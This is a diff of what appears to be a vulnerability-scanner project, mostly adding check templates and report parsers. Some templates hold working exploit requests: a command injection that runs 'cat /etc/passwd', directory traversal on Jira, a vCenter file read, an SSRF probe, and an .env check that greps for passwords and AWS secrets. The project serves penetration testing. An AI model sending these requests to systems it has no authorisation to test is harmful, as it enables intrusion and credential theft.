GREP_REDIRECT="forward=|dest=|redirect=|uri=|path=|continue=|url=|window=|to=|out=|view=|dir=|show=|navigation=|Open=|file=|val=|validate=|domain=|callback=|return=|page=|feed=|host=|port=|next=|data=|reference=|site=|html="
|
||||
GREP_RCE="daemon|upload|dir|execute|download|log|ip|cli|cmd"
|
||||
GREP_IDOR="id|user|account|number|order|no|doc|key|email|group|profile|edit|report"
|
||||
GREP_SQL="id|select|report|role|update|query|user|name|sort|where|search|params|process|row|view|table|from|sel|results|sleep|fetch|order|keyword|column|field|delete|string|number|filter"
|
||||
GREP_LFI="file|document|folder|root|path|pg|style|pdf|template|php_path|doc"
|
||||
GREP_SSTI="template|preview|id|view|activity|name|content|redirect"
|
||||
GREP_DEBUG="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|config"
|
||||
|
||||
# DOMAIN WORDLISTS
|
||||
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
|
||||
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-default.txt"
|
||||
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
|
||||
# DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
|
||||
|
||||
# DEFAULT USER/PASS WORDLISTS
|
||||
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
|
||||
|
|
@ -118,7 +140,6 @@ NMAP_OPTIONS="--script-args http.useragent='' --open"
|
|||
# NMAP PORT CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,80,443,8000,8080,8443"
|
||||
DEFAULT_PORTS="10000,1099,110,111,123,135,137,139,1433,1524,161,162,16992,2049,21,2121,2181,22,23,25,264,27017,27018,27019,28017,3128,3306,3310,3389,3632,389,443,4443,445,49152,49180,500,512,513,514,53,5432,5555,5800,5900,5984,623,624,6667,67,68,69,7001,79,80,8000,8001,8080,8180,8443,8888,9200,9495"
|
||||
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,500,520,2049"
|
||||
FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
|
||||
THREADS="100"
|
||||
|
||||
|
|
@ -162,6 +183,7 @@ DIRSEARCH="1"
|
|||
GOBUSTER="0"
|
||||
NIKTO="0"
|
||||
BLACKWIDOW="1"
|
||||
INJECTX="1"
|
||||
CLUSTERD="0"
|
||||
WPSCAN="0"
|
||||
CMSMAP="0"
|
||||
|
|
@ -173,14 +195,7 @@ JEXBOSS="0"
|
|||
WEBTECH="1"
|
||||
SSL_INSECURE="1"
|
||||
HTTP_PROBE="1"
|
||||
|
||||
# ACTIVE WEB BRUTE FORCE STAGES
|
||||
WEB_BRUTE_STEALTHSCAN="1"
|
||||
WEB_BRUTE_COMMONSCAN="1"
|
||||
WEB_BRUTE_FULLSCAN="0"
|
||||
WEB_BRUTE_EXPLOITSCAN="0"
|
||||
WEB_JAVASCRIPT_ANALYSIS="1"
|
||||
MAX_JAVASCRIPT_FILES="25"
|
||||
SMUGGLER="1"
|
||||
|
||||
# PASSIVE WEB PLUGINS
|
||||
WAYBACKMACHINE="1"
|
||||
|
|
@ -214,4 +229,5 @@ SHODAN="0"
|
|||
ASN_CHECK="1"
|
||||
SPYSE="1"
|
||||
GITHUB_SUBDOMAINS="0"
|
||||
RAPIDDNS="1"
|
||||
RAPIDDNS="1"
|
||||
SCAN_ALL_DISCOVERED_DOMAINS="1"
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='AvantFAX LOGIN Detected'
|
||||
URI=''
|
||||
METHOD='GET'
|
||||
MATCH="AvantFAX\ LOGIN"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1'
|
||||
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
|
||||
METHOD='GET'
|
||||
MATCH='artifactId'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS='-L --user-agent '' -s --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2'
|
||||
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties"
|
||||
METHOD='GET'
|
||||
MATCH='artifactId'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS='-L --user-agent '' -s --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services'
|
||||
URI="/ReportServer/Pages/ReportViewer.aspx"
|
||||
METHOD='GET'
|
||||
MATCH="view\ report"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s --insecure -I "
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint'
|
||||
URI="/secure/ViewUserHover.jspa"
|
||||
METHOD='GET'
|
||||
MATCH="User\ does\ not\ exist"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s --insecure -L "
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-15920 - Mida eFramework Unauthenticated RCE'
|
||||
URI='/PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING'
|
||||
URI='/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
|
|
|
|||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection'
|
||||
URI='/global-protect/login.esp'
|
||||
METHOD='GET'
|
||||
MATCH='ETag|Last-Modified'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS=''
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-25213 - WP File Manager File Upload'
|
||||
URI="/wp-content/plugins/wp-file-manager/readme.txt"
|
||||
METHOD='GET'
|
||||
MATCH="(Stable\stag\:\s[0-6]\.[0-8])"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s --insecure -I "
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution'
|
||||
URI='/console/login/LoginForm.jsp'
|
||||
METHOD='GET'
|
||||
MATCH='10.3.6.0|12.1.3.0|12.2.1.3|12.2.1.4'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix'
|
||||
URI="/proxy.stream?origin=http://burpcollaborator.net/"
|
||||
METHOD='GET'
|
||||
MATCH="Burp\ Collaborator\ Server"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution'
|
||||
URI="/version.web"
|
||||
METHOD='GET'
|
||||
MATCH='3.10.4.72058|3.12.4.76544|3.8.2.67295|7.0.2.81005|7.2.7.86974|7.4.3.89785|7.6.4.94391|7.8.2.97826|8.0.6.105408|8.2.2.107285|8.4.3.111614|8.6.3.116175|8.8.1.118913|9.0.3.124620|9.2.0.127940|9.4.3.137684|9.6.7.145949|9.8.4.149166|19.03.3.152166|19.06.4.157118|19.09.4.0|19.12.2.0|20.03.2.0|20.06.3.0'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Jaspersoft Detected'
|
||||
URI='/jasperserver/login.html?error=1'
|
||||
METHOD='GET'
|
||||
MATCH="Jaspersoft"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -2,8 +2,8 @@ AUTHOR='@xer0dayz'
|
|||
VULN_NAME='Laraval Environment File Found'
|
||||
URI='/.env'
|
||||
METHOD='GET'
|
||||
MATCH="APP_NAME"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
MATCH="DB_PASSWORD|REDIS_PASSWORD|MAIL_PASSWORD|AWS_SECRET|PUSHER_APP_|MIX_PUSHER_APP_"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Mailman Version Disclosure'
|
||||
URI='/mailman/listinfo'
|
||||
METHOD='GET'
|
||||
MATCH="Delivered\ by\ Mailman"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS=''
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='PHP Composer Disclosure'
|
||||
URI='/composer.json'
|
||||
METHOD='GET'
|
||||
MATCH='repositories|require-dev'
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Unauthenticated Jenkins Dashboard Detected'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH="\[Jenkins\]"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='VMware vCenter Unauthenticated Arbitrary File Read'
|
||||
URI='/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties'
|
||||
METHOD='GET'
|
||||
MATCH="driver|dbtype"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Wordpress WP-File-Manager Version Detected'
|
||||
URI="/wp-content/plugins/wp-file-manager/readme.txt"
|
||||
METHOD='GET'
|
||||
MATCH="Stable\ tag\:"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='cPanel Login Found'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH="cPanel\ Login"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS=''
|
||||
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:2083${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:2083${URI},$(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-2083-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:2083/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:2083${URI} - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
|
|
@ -1,12 +1,10 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Component With Known Vulnerabilities - NMap'
|
||||
FILENAME="$LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt"
|
||||
MATCH="CVE\-"
|
||||
FILENAME="$LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt"
|
||||
MATCH="vulners.com"
|
||||
GREP_OPTIONS='-ih'
|
||||
TYPE="network"
|
||||
|
||||
rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$5=AWK_TARGET{print "P3 - MEDIUM, Components with Known Vulnerabilities - NMap, " $5 ", " $2 " " $3 " " $4}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
|
||||
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Nessus Import'
|
||||
FILENAME="$LOOT_DIR/output/nessus-report_$TARGET_*.csv"
|
||||
FILENAME="${LOOT_DIR}/output/nessus-report_${TARGET}_*.csv"
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
TYPE="network"
|
||||
|
||||
|
|
|
|||
|
|
@ -15,25 +15,25 @@ sed -i '1d' /tmp/out 2> /dev/null
|
|||
cat /tmp/out 2> /dev/null | while read line; do
|
||||
x=$(( x+1 ))
|
||||
if [ $x -eq "1" ]; then
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [ $x -eq "2" ]; then
|
||||
if [[ $line =~ .*Critical.* ]]; then
|
||||
echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*High.* ]]; then
|
||||
echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Medium.* ]]; then
|
||||
echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Low.* ]]; then
|
||||
echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Informational.* ]]; then
|
||||
echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
fi
|
||||
elif [ $x -eq "3" ]; then
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [ $x -eq "4" ]; then
|
||||
echo "$line" >> /tmp/report.txt
|
||||
echo "$line" >> /tmp/report.txt 2> /dev/null
|
||||
x=0
|
||||
fi
|
||||
done
|
||||
cat /tmp/report.txt | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
|
||||
cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
|
@ -15,25 +15,25 @@ sed -i '1d' /tmp/out 2> /dev/null
|
|||
cat /tmp/out 2> /dev/null | while read line; do
|
||||
x=$(( x+1 ))
|
||||
if [ $x -eq "1" ]; then
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [ $x -eq "2" ]; then
|
||||
if [[ $line =~ .*Critical.* ]]; then
|
||||
echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*High.* ]]; then
|
||||
echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Medium.* ]]; then
|
||||
echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Low.* ]]; then
|
||||
echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [[ $line =~ .*Informational.* ]]; then
|
||||
echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
fi
|
||||
elif [ $x -eq "3" ]; then
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt
|
||||
echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
|
||||
elif [ $x -eq "4" ]; then
|
||||
echo "$line" >> /tmp/report.txt
|
||||
echo "$line" >> /tmp/report.txt 2> /dev/null
|
||||
x=0
|
||||
fi
|
||||
done
|
||||
cat /tmp/report.txt | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
|
||||
cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
|
@ -6,7 +6,5 @@ MATCH="\+"
|
|||
GREP_OPTIONS='-ih'
|
||||
|
||||
rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | grep -v "Target\ " | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nikto Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
|
@ -6,7 +6,5 @@ MATCH="\+"
|
|||
GREP_OPTIONS='-ih'
|
||||
|
||||
rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | grep -v "Target\ " | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nikto Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
||||
cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
|
|
@ -0,0 +1,73 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='OWASP Zap Scan - HTTP'
|
||||
FILENAME="$LOOT_DIR/web/zap-report-${TARGET}-http.html"
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
|
||||
rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep '<name>' -A20 | egrep '<name>|<riskdesc>|<uri>|<desc>' > /tmp/raw_out.txt 2> /dev/null
|
||||
grep '<name>' /tmp/raw_out.txt 2> /dev/null| cut -d'<' -f2 | cut -d'>' -f2 > /tmp/vulns.txt 2> /dev/null
|
||||
grep '<riskdesc>' /tmp/raw_out.txt 2> /dev/null| cut -d'<' -f2 | cut -d'>' -f2 > /tmp/risk.txt 2> /dev/null
|
||||
grep '<desc>' /tmp/raw_out.txt 2> /dev/null| cut -d\; -f3 > /tmp/desc.txt 2> /dev/null
|
||||
|
||||
awk 'FNR==1' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' > /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==2' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==3' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==4' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==5' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==6' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==7' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==8' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==9' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==10' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==11' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==12' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==13' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==14' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==15' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==16' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==17' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==18' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==19' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==20' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==21' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==22' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==23' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==24' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
awk 'FNR==25' /tmp/risk.txt /tmp/vulns.txt /tmp/desc.txt 2> /dev/null | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' >> /tmp/report.csv 2> /dev/null
|
||||
